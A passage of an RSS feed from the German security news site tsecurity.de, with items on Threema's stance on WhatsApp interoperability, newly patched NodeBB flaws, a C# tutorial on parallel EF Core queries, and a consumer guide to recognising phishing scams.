CVE-2026-63955, CVE-2026-63956, CVE-2026-63957, CVE-2026-63958,
CVE-2026-63959, CVE-2026-63960, CVE-2026-63961, CVE-2026-63962,
CVE-2026-63963, CVE-2026-63964, CVE-2026-63965, CVE-2026-63966,
CVE-2026-63967, CVE-2026-63968, CVE-2026-63969, CVE-2026-63970,
CVE-2026-63971, CVE-2026-63972, CVE-2026-63973, CVE-2026-63974,
CVE-2026-63975, CVE-2026-63976, CVE-2026-63977, CVE-2026-63978,
CVE-2026-63979, CVE-2026-63980, CVE-2026-63981, CVE-2026-63982,
CVE-2026-63983, CVE-2026-63984, CVE-2026-63985, CVE-2026-63986,
CVE-2026-63987, CVE-2026-63988, CVE-2026-63989, CVE-2026-63990,
CVE-2026-63991, CVE-2026-63992, CVE-2026-63993, CVE-2026-63994,
CVE-2026-63995, CVE-2026-63996, CVE-2026-63997, CVE-2026-63998,
CVE-2026-63999, CVE-2026-64000, CVE-2026-64001, CVE-2026-64002,
CVE-2026-64003, CVE-2026-64004, CVE-2026-64005, CVE-2026-64006,
CVE-2026-64007, CVE-2026-64008, CVE-2026-64009, CVE-2026-64010,
CVE-2026-64011, CVE-2026-64012, CVE-2026-64013, CVE-2026-64014,
CVE-2026-64015, CVE-2026-64017, CVE-2026-64018, CVE-2026-64019,
CVE-2026-64020, CVE-2026-64021, CVE-2026-64022, CVE-2026-64023,
CVE-2026-64024, CVE-2026-64025, CVE-2026-64026, CVE-2026-64027,
CVE-2026-64029, CVE-2026-64030, CVE-2026-64031, CVE-2026-64032,
CVE-2026-64033, CVE-2026-64034, CVE-2026-64035, CVE-2026-64036,
CVE-2026-64037, CVE-2026-64038, CVE-2026-64039, CVE-2026-64040,
CVE-2026-64041, CVE-2026-64042, CVE-2026-64043, CVE-2026-64044,
CVE-2026-64045, CVE-2026-64046, CVE-2026-64047, CVE-2026-64048,
CVE-2026-64049, CVE-2026-64050, CVE-2026-64051, CVE-2026-64052,
CVE-2026-64053, CVE-2026-64054, CVE-2026-64055, CVE-2026-64056,
CVE-2026-64057, CVE-2026-64058, CVE-2026-64059, CVE-2026-64060,
CVE-2026-64061, CVE-2026-64062, CVE-2026-64063, CVE-2026-64064,
CVE-2026-64065, CVE-2026-64066, CVE-2026-64067, CVE-2026-64068,
CVE-2026-64069, CVE-2026-64070, CVE-2026-64071, CVE-2026-64072,
CVE-2026-64073, CVE-2026-64074, CVE-2026-64075, CVE-2026-64076,
CVE-2026-64077, CVE-2026-64078, CVE-2026-64079, CVE-2026-64080,
CVE-2026-64081, CVE-2026-64082, CVE-2026-64083, CVE-2026-64084,
CVE-2026-64085, CVE-2026-64086, CVE-2026-64087, CVE-2026-64088,
CVE-2026-64089, CVE-2026-64090, CVE-2026-64091, CVE-2026-64093,
CVE-2026-64094, CVE-2026-64095, CVE-2026-64096, CVE-2026-64097,
CVE-2026-64098, CVE-2026-64099, CVE-2026-64100, CVE-2026-64101,
CVE-2026-64102, CVE-2026-64103, CVE-2026-64104, CVE-2026-64105,
CVE-2026-64106, CVE-2026-64107, CVE-2026-64108, CVE-2026-64109,
CVE-2026-64110, CVE-2026-64111, CVE-2026-64112, CVE-2026-64113,
CVE-2026-64114, CVE-2026-64115, CVE-2026-64116, CVE-2026-64117,
CVE-2026-64118, CVE-2026-64119, CVE-2026-64120, CVE-2026-64121,
CVE-2026-64122, CVE-2026-64123, CVE-2026-64124, CVE-2026-64125,
CVE-2026-64126, CVE-2026-64127, CVE-2026-64128, CVE-2026-64129,
CVE-2026-64130, CVE-2026-64131, CVE-2026-64132, CVE-2026-64133,
CVE-2026-64134, CVE-2026-64135, CVE-2026-64136, CVE-2026-64137,
CVE-2026-64138, CVE-2026-64140, CVE-2026-64141, CVE-2026-64142,
CVE-2026-64143, CVE-2026-64144, CVE-2026-64145, CVE-2026-64146,
CVE-2026-64147, CVE-2026-64148, CVE-2026-64149, CVE-2026-64150,
CVE-2026-64151, CVE-2026-64152, CVE-2026-64153, CVE-2026-64154,
CVE-2026-64155, CVE-2026-64156, CVE-2026-64157, CVE-2026-64158,
CVE-2026-64159, CVE-2026-64160, CVE-2026-64161, CVE-2026-64162,
CVE-2026-64163, CVE-2026-64164, CVE-2026-64165, CVE-2026-64166,
CVE-2026-64167, CVE-2026-64168, CVE-2026-64169, CVE-2026-64170,
CVE-2026-64171, CVE-2026-64172, CVE-2026-64173, CVE-2026-64174,
CVE-2026-64175, CVE-2026-64176, CVE-2026-64177, CVE-2026-64178,
CVE-2026-64179, CVE-2026-64180, CVE-2026-64181, CVE-2026-64182,
CVE-2026-64183, CVE-2026-64184, CVE-2026-64185, CVE-2026-64186)]]></content:encoded>
</item>
<item>
<title><![CDATA[Öffnung von WhatsApp: Threema lehnt Anbindung nicht nur wegen Datenschutz ab]]></title>
<description><![CDATA[Unter EU-Vorgaben musste WhatsApp für Chats mit anderen Messengern geöffnet werden. Nicht nur aus Datenschutzgründen lehnt Threema das weiterhin ab.]]></description>
<link>https://tsecurity.de/de/3691124/it-security-nachrichten/oeffnung-von-whatsapp-threema-lehnt-anbindung-nicht-nur-wegen-datenschutz-ab/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691124/it-security-nachrichten/oeffnung-von-whatsapp-threema-lehnt-anbindung-nicht-nur-wegen-datenschutz-ab/</guid>
<pubDate>Fri, 24 Jul 2026 11:32:18 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Unter EU-Vorgaben musste WhatsApp für Chats mit anderen Messengern geöffnet werden. Nicht nur aus Datenschutzgründen lehnt Threema das weiterhin ab.]]></content:encoded>
</item>
<item>
<title><![CDATA[Öffnung von WhatsApp: Threema lehnt Anbindung nicht nur wegen Datenschutz ab]]></title>
<description><![CDATA[Unter EU-Vorgaben musste WhatsApp für Chats mit anderen Messengern geöffnet werden. Nicht nur aus Datenschutzgründen lehnt Threema das weiterhin ab.]]></description>
<link>https://tsecurity.de/de/3691110/it-nachrichten/oeffnung-von-whatsapp-threema-lehnt-anbindung-nicht-nur-wegen-datenschutz-ab/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691110/it-nachrichten/oeffnung-von-whatsapp-threema-lehnt-anbindung-nicht-nur-wegen-datenschutz-ab/</guid>
<pubDate>Fri, 24 Jul 2026 11:24:26 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Unter EU-Vorgaben musste WhatsApp für Chats mit anderen Messengern geöffnet werden. Nicht nur aus Datenschutzgründen lehnt Threema das weiterhin ab.]]></content:encoded>
</item>
<item>
<title><![CDATA[Öffnung von WhatsApp: Threema lehnt Anbindung nicht nur wegen Datenschutz ab]]></title>
<description><![CDATA[Unter EU-Vorgaben musste WhatsApp für Chats mit anderen Messengern geöffnet werden. Nicht nur aus Datenschutzgründen lehnt Threema das weiterhin ab.]]></description>
<link>https://tsecurity.de/de/3691109/it-nachrichten/oeffnung-von-whatsapp-threema-lehnt-anbindung-nicht-nur-wegen-datenschutz-ab/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691109/it-nachrichten/oeffnung-von-whatsapp-threema-lehnt-anbindung-nicht-nur-wegen-datenschutz-ab/</guid>
<pubDate>Fri, 24 Jul 2026 11:24:08 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Unter EU-Vorgaben musste WhatsApp für Chats mit anderen Messengern geöffnet werden. Nicht nur aus Datenschutzgründen lehnt Threema das weiterhin ab.]]></content:encoded>
</item>
<item>
<title><![CDATA[NodeBB Patches Eight AI-Found Flaws Exposing Admin Access and Private Chats]]></title>
<description><![CDATA[Eight security flaws in NodeBB went public on Wednesday, along with the code to exploit them. Aikido Security rates all eight as high severity and says its AI pentest agents found them in a six-hour review of the forum software’s…
Read more →
The post NodeBB Patches Eight AI-Found Flaws Exposing ...]]></description>
<link>https://tsecurity.de/de/3691090/it-security-nachrichten/nodebb-patches-eight-ai-found-flaws-exposing-admin-access-and-private-chats/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691090/it-security-nachrichten/nodebb-patches-eight-ai-found-flaws-exposing-admin-access-and-private-chats/</guid>
<pubDate>Fri, 24 Jul 2026 11:09:26 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Eight security flaws in NodeBB went public on Wednesday, along with the code to exploit them. Aikido Security rates all eight as high severity and says its AI pentest agents found them in a six-hour review of the forum software’s…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/nodebb-patches-eight-ai-found-flaws-exposing-admin-access-and-private-chats/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/nodebb-patches-eight-ai-found-flaws-exposing-admin-access-and-private-chats/">NodeBB Patches Eight AI-Found Flaws Exposing Admin Access and Private Chats</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[How to execute queries in parallel using EF Core]]></title>
<description><![CDATA[EF Core is Microsoft’s flagship ORM (object-relational mapper), the software layer that allows .NET developers to work with relational databases. The DbContext class is the core component of the EF Core framework for managing database operations. However, the DbContext class in EF Core is not thr...]]></description>
<link>https://tsecurity.de/de/3691080/ai-nachrichten/how-to-execute-queries-in-parallel-using-ef-core/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691080/ai-nachrichten/how-to-execute-queries-in-parallel-using-ef-core/</guid>
<pubDate>Fri, 24 Jul 2026 11:04:59 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">EF Core is Microsoft’s flagship ORM (object-relational mapper), the software layer that allows .NET developers to work with relational databases. The <code>DbContext</code> class is the core component of the EF Core framework for managing database operations. However, the <code>DbContext</code> class in EF Core is not thread-safe. Hence, if you share <code>DbContext</code> instances between multiple threads, you will often encounter data corruption issues and the <code>InvalidOperationException</code>.</p>



<p class="wp-block-paragraph">In this article, we’ll learn how we can execute queries in parallel in EF Core by handling thread-safety issues to avoid concurrency errors. To work with the code examples provided in this article, you should have Visual Studio 2026 installed in your system. You can <a href="https://visualstudio.microsoft.com/insiders/">download Visual Studio 2026 here</a>.</p>



<h2 class="wp-block-heading">Executing EF Core queries in parallel – the problem</h2>



<p class="wp-block-paragraph">When working in today’s data-driven applications, you will often need to fetch data from multiple unrelated datasets. In applications that use concurrency, thread-safety is critical to guaranteeing correct execution, avoiding data corruption and race conditions, and ensuring data consistency. Let’s understand this with an example. </p>



<p class="wp-block-paragraph">Let’s say we want to populate a dashboard that displays all recently processed orders, metrics, logs, and traces, as well as your application’s performance metadata. We might write the following code. </p>



<pre class="wp-block-code"><code>public class Dashboard
{
    public List Orders { get; set; } = new();
    public Metrics Metrics { get; set; } = new();
    public List Logs { get; set; } = new();
    public List Traces { get; set; } = new();
}
public static async Task LoadDashboardAsync(ProductService productService)
{
    Task&lt;List&gt;    ordersTask  = productService.GetProcessedOrdersAsync();
    Task        metricsTask = productService.GetMetricsAsync();
    Task&lt;List&gt; logsTask    = productService.GetRecentLogsAsync();
    Task&lt;List&gt;    tracesTask  = productService.GetTracesAsync();
    await Task.WhenAll(ordersTask, metricsTask, logsTask, tracesTask);
    return new Dashboard
    {
        Orders  = await ordersTask,
        Metrics = await metricsTask,
        Logs    = await logsTask,
        Traces  = await tracesTask
    };
}
</code></pre>



<p class="wp-block-paragraph">In the preceding code snippet, there are four read operations that are executed by four different <code>Task</code> instances. Our objective is to ensure that the database round trips run in parallel instead of in sequence. We can accomplish this by using<code>Task.WhenAll</code>, which starts the four tasks, waits for every task to finish, then returns the data wrapped inside a new <code>Dashboard</code> instance.</p>



<p class="wp-block-paragraph">If we executed these queries sequentially, the user would have to wait until each query completed its execution in turn—for a total wait time equal to the sum of the times for all four queries. However, by running these queries in parallel, we reduce the wait time considerably. The user will need to wait only as long as it takes for the slowest of the four queries to complete its execution.</p>



<p class="wp-block-paragraph">However, there is a danger with the above approach. If you run multiple operations on the same <code>DbContext</code> instance, you will see an <code>InvalidOperationException</code> with the following message:</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p class="wp-block-paragraph">A second operation started in this context before the previous operation was completed. This is usually caused by multiple threads using the same <code>DbContext</code> instance; instance members are not guaranteed to be thread-safe.</p>
</blockquote>



<p class="wp-block-paragraph">Databases such as SQL Server, PostgreSQL, and Oracle Database follow a request-response communication model at the connection level: a single connection can process only one command at a time. Hence, you cannot run multiple queries concurrently using the connection. If you <code>await</code> several operations using the same connection, EF Core detects the overlapping use of a non-thread-safe context and throws an <code>InvalidOperationException</code>. To run queries in parallel, you must give each task its own connection or context.</p>



<h2 class="wp-block-heading">Why DbContext isn’t thread-safe – and how to work around it</h2>



<p class="wp-block-paragraph">The <code>DbContext</code> class in EF Core is designed to manage a single unit of work. To be more precise, EF Core does not provide support for running multiple operations on the same <code>DbContext</code> instance. This design approach creates inherent challenges when you use the same <code>DbContext</code> instance across multiple threads. If <code>DbContext</code> were thread-safe, extensive locking would be required, which would degrade data access performance.</p>



<p class="wp-block-paragraph">This stateful design of <code>DbContext</code> makes it unsuitable for concurrent access patterns that involve loading, modifying, or tracking different sets of data simultaneously, because it needs to maintain the internal representation of database state.</p>



<p class="wp-block-paragraph">The <a href="https://learn.microsoft.com/en-us/ef/core/change-tracking/" data-type="link" data-id="https://learn.microsoft.com/en-us/ef/core/change-tracking/">change tracker</a> is one of the most important components of <code>DbContext</code> in EF Core. It monitors all entities loaded into memory and detects any changes made to them after they have been loaded. It keeps track of the original, current, and changed values of the entities, thereby enabling the EF Core runtime to know the current state of these entities when you call the <code>SaveChanges()</code> method on the <code>DbContext</code> instance.</p>



<p class="wp-block-paragraph">To implement thread-safety when working with DbContext, we must write our code to ensure that each concurrent operation gets its own copy of a short-lived instance. Now, we <em>could</em> accomplish this by wrapping a shared <code>DbContext</code> instance inside a thread-safe block using the <code>lock</code> keyword, so that all calls to the database take place using one and only one thread at a time. This approach is illustrated in the code snippet below. </p>



<pre class="wp-block-code"><code>using Microsoft.EntityFrameworkCore;
public class Product
{
    public int Id { get; set; }
    public string Name { get; set; } = string.Empty;
    public decimal Price { get; set; }
    public int Quantity { get; set; }
}
public class AppDbContext : DbContext
{
    public AppDbContext(DbContextOptions options) : base(options) { }
    public DbSet Products =&gt; Set();
}
</code></pre>



<p class="wp-block-paragraph">However, while the above approach gives us the thread-safety we need, it can degrade data access performance considerably. A better approach is to use <code>IDbContextFactory</code> , which creates fresh <code>DbContext</code> instances on demand. Calling its <code>CreateDbContext()</code> method is cheap and produces a fresh, isolated context every time. </p>



<p class="wp-block-paragraph">The following code snippet shows how you can register an instance of type <code>IDbContextFactory</code> as a singleton. You can safely call this code from any thread.</p>



<pre class="wp-block-code"><code>builder.Services.AddDbContextFactory(options =&gt;
    options.UseSqlServer(
        builder.Configuration.GetConnectionString("Default")));
</code></pre>



<h2 class="wp-block-heading">Executing EF Core queries in parallel – the solution</h2>



<p class="wp-block-paragraph">Now let’s see how we can put <code>IDbContextFactory</code> to work. The following code illustrates a class named <code>ProductService</code> that uses a factory to create <code>DbContext</code> instances for each scope of work.</p>



<pre class="wp-block-code"><code>public class ProductService
{
    private readonly IDbContextFactory _factory;
    public ProductService(IDbContextFactory factory)
        =&gt; _factory = factory;
    public async Task GetByIdAsync(int id)
    {
        await using var context = await _factory.CreateDbContextAsync();
        return await context.Products.FindAsync(id);
    }
    public async Task UpdateStockQuantityAsync(int id, int updateQuantity)
    {
        await using var context = await _factory.CreateDbContextAsync();
        var product = await context.Products.FindAsync(id);
        if (product is null) return;
        product.Quantity += updateQuantity;
        await context.SaveChangesAsync();
    }
}
</code></pre>



<p class="wp-block-paragraph">Note that <code>ProductService</code> has two methods, <code>GetByIdAsync</code> and <code>UpdateStockQuantityAsync</code>. An instance of the <code>DbContext</code> class is created locally in each of these methods. Now, suppose you have two threads, T1 and T2, that execute these methods concurrently. That is, thread T1 executes the <code>GetByIdAsync</code> method while thread T2 executes the <code>UpdateStockQuantityAsync</code> method. Because each of these methods is executed in isolation, they will have their own context, connection, and change-tracking information, and there will be no mutable state, so you don’t need to implement thread synchronization in either of these methods.</p>



<p class="wp-block-paragraph">Consider the following code that executes a read operation and an update operation in two separate tasks. </p>



<pre class="wp-block-code"><code>public static async Task RunMethodsInParallelAsync(ProductService productService)
{
      Task readTask = productService.GetByIdAsync(1);
      Task updateTask = productService.UpdateStockQuantityAsync(3, 5);
      await Task.WhenAll(readTask, updateTask);
      Product? product = await readTask;
 }
</code></pre>



<p class="wp-block-paragraph">The <code>Task.WhenAll</code> method runs the two tasks in parallel and waits until both have finished. The reason this approach is thread-safe, and will not create concurrency errors, is that each of these two methods creates its own <code>DbContext</code> instance internally. Therefore the read operation and the update operation use independent <code>DbContext</code> instances.</p>



<h2 class="wp-block-heading">Use DbContext pooling to reduce allocation cost</h2>



<p class="wp-block-paragraph">Although creating <code>DbContext</code> instances is not that costly, you should consider using pooled contexts in applications that require high scalability and high performance. The following code snippet shows how you can register a pooled context. </p>



<pre class="wp-block-code"><code>builder.Services.AddPooledDbContextFactory(options =&gt;
    options.UseSqlServer(connectionString));
</code></pre>



<p class="wp-block-paragraph">A call to <code>AddDbContext()</code> will register a <code>DbContext</code> instance as scoped per HTTP request. Each request will run on a different thread and each will have its own context. However, keep in mind that the default scoped registration of the <code>DbContext</code> will not always suffice.</p>



<p class="wp-block-paragraph">You will need a factory to create instances of <code>DbContext</code> when you’re using a background service, or performing some work inside a particular request, or running some business logic operation over multiple contexts.</p>



<h2 class="wp-block-heading">Key takeaways</h2>



<ul class="wp-block-list">
<li>If you use EF Core in the data access layer of your application, you must implement thread safety measures whenever you run your queries in parallel.</li>



<li>You cannot execute multiple queries in parallel in EF Core using the same <code>DbContext</code> instance.</li>



<li>The <code>IDbContextFactory</code> enables you to create a <code>DbContext</code> instance for each thread, thereby enabling you to work with these instances in isolation.</li>



<li>Although using a <code>DbContext</code> pool involves a small allocation overhead, it becomes a non-issue if you need high throughput.</li>
</ul>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[NodeBB Patches Eight AI-Found Flaws Exposing Admin Access and Private Chats]]></title>
<description><![CDATA[Eight security flaws in NodeBB went public on Wednesday, along with the code to exploit them. Aikido Security rates all eight as high severity and says its AI pentest agents found them in a six-hour review of the forum software's source code.

Every version before 4.14.0 is affected. NodeBB has f...]]></description>
<link>https://tsecurity.de/de/3691058/it-security-nachrichten/nodebb-patches-eight-ai-found-flaws-exposing-admin-access-and-private-chats/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691058/it-security-nachrichten/nodebb-patches-eight-ai-found-flaws-exposing-admin-access-and-private-chats/</guid>
<pubDate>Fri, 24 Jul 2026 10:58:49 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Eight security flaws in NodeBB went public on Wednesday, along with the code to exploit them. Aikido Security rates all eight as high severity and says its AI pentest agents found them in a six-hour review of the forum software's source code.

Every version before 4.14.0 is affected. NodeBB has fixed them all, and administrators should be on 4.14.2.

The simplest one takes a settings change. A]]></content:encoded>
</item>
<item>
<title><![CDATA[Phishing-Fallen: KI-Mails, QR-Codes, falsche Warnungen – so schützen Sie sich]]></title>
<description><![CDATA[Zwei große Änderungen hat es in den vergangenen Jahren bei Phishing-Angriffen gegeben: Die Kriminellen erstellen mithilfe von generativer KI sprachlich fast perfekte Mails, die in Stil, Struktur und Tonalität kaum noch von legitimen Nachrichten zu unterscheiden sind. Wo früher holpriges Deutsch s...]]></description>
<link>https://tsecurity.de/de/3691032/windows-tipps/phishing-fallen-ki-mails-qr-codes-falsche-warnungen-so-schuetzen-sie-sich/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691032/windows-tipps/phishing-fallen-ki-mails-qr-codes-falsche-warnungen-so-schuetzen-sie-sich/</guid>
<pubDate>Fri, 24 Jul 2026 10:47:37 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Zwei große Änderungen hat es in den vergangenen Jahren bei Phishing-Angriffen gegeben: Die Kriminellen erstellen mithilfe von generativer KI sprachlich fast perfekte Mails, die in Stil, Struktur und Tonalität kaum noch von legitimen Nachrichten zu unterscheiden sind. Wo früher holpriges Deutsch sofort Misstrauen geweckt hat, liest sich heute eine Phishing-Mail wie eine echte Mitteilung von Microsoft, einer Bank oder einem Paketdienst.</p>



<p>Auch das Design wirkt meist höchst professionell. Zum anderen sind auch die technischen Tricks beim Datendiebstahl heute höher entwickelt. Einige Maschen umgehen sogar eine Zwei-Faktor-Authentifizierung. Das Ziel der Angreifer bleiben vor allem Zugangsdaten, Session-Tokens und persönliche Infos.</p>



<h2 class="wp-block-heading">1. Microsoft-365-Log-in-Falle trickst Zwei-Faktor-Anmeldung aus</h2>



<p>Eine neue Angriffsmethode verwendet den originalen Microsoft-Anmeldedialog und kommt entsprechend fast ohne gefälschte Webseiten aus. Die Kriminellen nutzen dafür den Oauth-Device-Code-Flow. Das ist ein Anmeldeverfahren für Geräte oder Programme, die keinen brauchbaren Browser oder keine komfortable Texteingabe bieten, etwa Smart-TVs, IoT-Geräte, Drucker oder CLI-Tools. </p>



<p>Offiziell heißt er „OAuth 2.0 Device Authorization Grant“. Mit der Methode lassen sich auch Konten übernehmen, die mit einer Zwei-Faktor-Authentifizierung geschützt sind.</p>



<p>Die Kriminellen schicken an ihre Opfer eine Phishing-Nachricht und geben vor, das Gerät der Opfer müsste für den Log-in ins Microsoft-365-Konto neu autorisiert werden. Die Nachrichten beginnen meist harmlos, etwa mit „Ihre Sitzung ist abgelaufen“, und bieten einen Link zur Neuanmeldung. Wenn das Opfer dem Link in der Nachricht folgt, landet es zunächst auf einer gefälschten Website, schließlich aber beim offiziellen Microsoft-Authentifizierungsverfahren für Geräte und Anwendungen (Oauth-Device-Code-Flow).</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a63269712915"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/Phishing-Fallen-M365-Phishing-Quelle-Proofpoint.jpg?quality=50&amp;strip=all" alt="Phishing Fallen M365 Phishing Quelle Proofpoint" class="wp-image-3187589" width="1140" height="1082" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Bei diesem Trick übernehmen die Angreifer auch Konten, die mit einem zweiten Faktor geschützt sind. Dafür kombinieren sie die echten Authentifizierungsseiten von Microsoft und Phishing-Webseiten.</p></figcaption></figure><p class="imageCredit">Proofpoint</p></div>



<p>Es handelt sich um echte Microsoft-Meldungen und Webseiten. Allerdings autorisiert das Opfer nicht den Zugang zu seinem eigenen PC oder Smartphone, sondern eine Anwendung der Kriminellen. Diese bekommen nach der Freigabe durch das getäuschte Opfer einen Access-Token. Damit kann die feindliche Anwendung per API auf das Microsoft-Konto zugreifen, ohne dass noch einmal ein Passwort eingegeben werden muss.</p>



<p>Übrigens: Die meisten dieser Angriffe verstecken den Link zur gefälschten Website in einem QR-Code. Dieser entgeht den Spam-Filtern eher als ein üblicher Link, und es lässt die meisten Opfer vom PC auf das Smartphone wechseln. </p>



<p>Auf diesem ist es wegen des kleineren Bildschirms und oft fehlender Sicherheits-Software noch wahrscheinlicher, dass das Opfer die Täuschung nicht bemerkt. <a href="https://tinyurl.com/2xhd6n6d" target="_blank" rel="noreferrer noopener">Eine ausführliche Analyse der Angriffe auf Microsoft-365-Konten haben die Sicherheitsexperten von Proofpoint veröffentlicht</a>.</p>



<h2 class="wp-block-heading">2. Support-Masche: Ihr Computer ist gesperrt &amp; Co.</h2>



<p>Die Support-Masche ist zwar nicht neu, funktioniert aber nach wie vor: Noch immer fallen zahlreiche Menschen auf die perfide Betrugsstrategie herein. Zu den prominenten Opfern zählt Bundestagspräsidentin Julia Klöckner. </p>



<p>Mutmaßlich staatlich organisierte Angreifer kontaktierten sie über den Messenger-Dienst Signal und gaben sich als vermeintliche Signal-Support-Mitarbeiter aus. Unter einem Vorwand forderten sie Klöckner und weitere Politiker auf, ihre PIN einzugeben. Dadurch erlangten die Angreifer Zugriff auf die Signal-Konten der Betroffenen – und damit auf private Chats und Kontakte.</p>



<p>Das Bundesamt für Verfassungsschutz und das Bundesamt für Sicherheit in der Informationstechnik (BSI) haben gemeinsam einen <a href="https://tinyurl.com/yc89cfjd" target="_blank" rel="noreferrer noopener">Leitfaden veröffentlicht</a>, der potenziellen Opfern hilft zu prüfen, ob ihr Signal-Konto übernommen wurde.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a632697134c5"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/Phishing-Fallen-MS-Support-Quelle-Bundesnetzagentur.png" alt="Phishing Fallen MS Support Quelle Bundesnetzagentur" class="wp-image-3187588" width="938" height="640" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Phishing mit der Support-Masche. Durch eine vorgetäuschte Windows- oder Defender-Warnung werden Sie zu einem Telefongespräch mit den Angreifern gedrängt.</p></figcaption></figure><p class="imageCredit">Bundesnetzagentur</p></div>



<p>Ebenfalls weiterhin verbreitet sind Angriffe durch angebliche Microsoft-Support-Mitarbeiter. Die Betrüger kontaktieren ihre Opfer per Telefon, E-Mail oder über gefälschte Pop-up-Warnungen im Browser. </p>



<p>Dabei behaupten sie, der Windows-PC habe ein Sicherheitsproblem – etwa sei der Computer gesperrt oder mit Schadsoftware infiziert. Anschließend versuchen sie, die Betroffenen zur Installation einer Fernwartungssoftware oder eines vermeintlichen Sicherheitstools zu bewegen. Tatsächlich erhalten die Angreifer dadurch oft vollständigen Zugriff auf den Rechner.</p>



<h2 class="wp-block-heading">3. Gefälschter Microsoft Defender warnt</h2>



<p>Der Microsoft Defender ist ein Windows-Bordmittel und schützt PCs gegen alle bekannten PC-Viren. Entsprechend alarmierend ist für viele Nutzer eine Warnung dieses Antiviren-Tools. Eine gefälschte Form dieser Warnung erscheint mal per E-Mail, mal als Pop-up im Browser. In diesen Nachrichten wird behauptet, der Schutz des Defenders müsse kostenpflichtig erneuert werden. In der Folge werden die Nutzer auf gefälschte Shop-Webseiten geleitet, die eine Zahlung für einen Virenschutz verlangen.</p>



<p>Grundsätzlich gilt: Der Microsoft Defender ist auf Privat-PCs ein Bordmittel und kostenlos in Windows enthalten. Eine Zahlung ist nicht nötig. Sollte die Warnung per Mail bei Ihnen landen, löschen Sie diese einfach. Schlägt sie als Pop-up im Browser auf, schließen Sie einfach das Browser-Fenster, notfalls mit der Tastenkombination „Alt+F4”. </p>



<p><a href="https://tinyurl.com/yaz82hf3" target="_blank" rel="noreferrer noopener">Der Antivirenspezialist Norton hat eine Anleitung veröffentlicht</a>, die erklärt, wie sich solche Pop-up-Warnungen im Browser beseitigen lassen, falls sie sich im System festgesetzt haben.</p>



<h2 class="wp-block-heading">4. Microsoft-Onedrive: Cloud-Phishing über Freigaben</h2>



